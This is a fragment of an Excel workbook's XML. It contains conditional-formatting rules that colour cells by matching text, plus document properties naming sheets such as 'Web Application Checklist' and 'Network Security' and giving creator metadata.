                  <bgColor theme="6" tint="-0.24994659260841701"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="8" operator="containsText" id="{F4E006C0-FA98-4967-A164-8A13F190DA03}">
            <xm:f>NOT(ISERROR(SEARCH($A$93,E27)))</xm:f>
            <xm:f>$A$93</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <xm:sqref>E27</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="containsText" priority="1" operator="containsText" id="{E0F1B80F-2755-462C-83DE-1604F294BD85}">
            <xm:f>NOT(ISERROR(SEARCH($A$96,E28)))</xm:f>
            <xm:f>$A$96</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="3" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="2" operator="containsText" id="{B7379FAA-252A-49CC-9B64-96026C677418}">
            <xm:f>NOT(ISERROR(SEARCH($A$95,E28)))</xm:f>
            <xm:f>$A$95</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor rgb="FFFF0000"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="3" operator="containsText" id="{5908ED2A-53B7-4C1B-A741-063E49475D27}">
            <xm:f>NOT(ISERROR(SEARCH($A$94,E28)))</xm:f>
            <xm:f>$A$94</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="-0.24994659260841701"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="4" operator="containsText" id="{132211B3-034C-4FEB-8326-BAF6145372F1}">
            <xm:f>NOT(ISERROR(SEARCH($A$93,E28)))</xm:f>
            <xm:f>$A$93</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <xm:sqref>E28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Web Application Checklist</vt:lpstr>
      <vt:lpstr>Network Security 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Bhavik Shah</dc:creator>
  <cp:lastModifiedBy>Bhavik Shah</cp:lastModifiedBy>
  <cp:lastPrinted>2020-07-30T17:09:59Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-07-29T16:49:28Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-07-30T17:11:51Z</dcterms:modified>
</cp:coreProperties>
</file>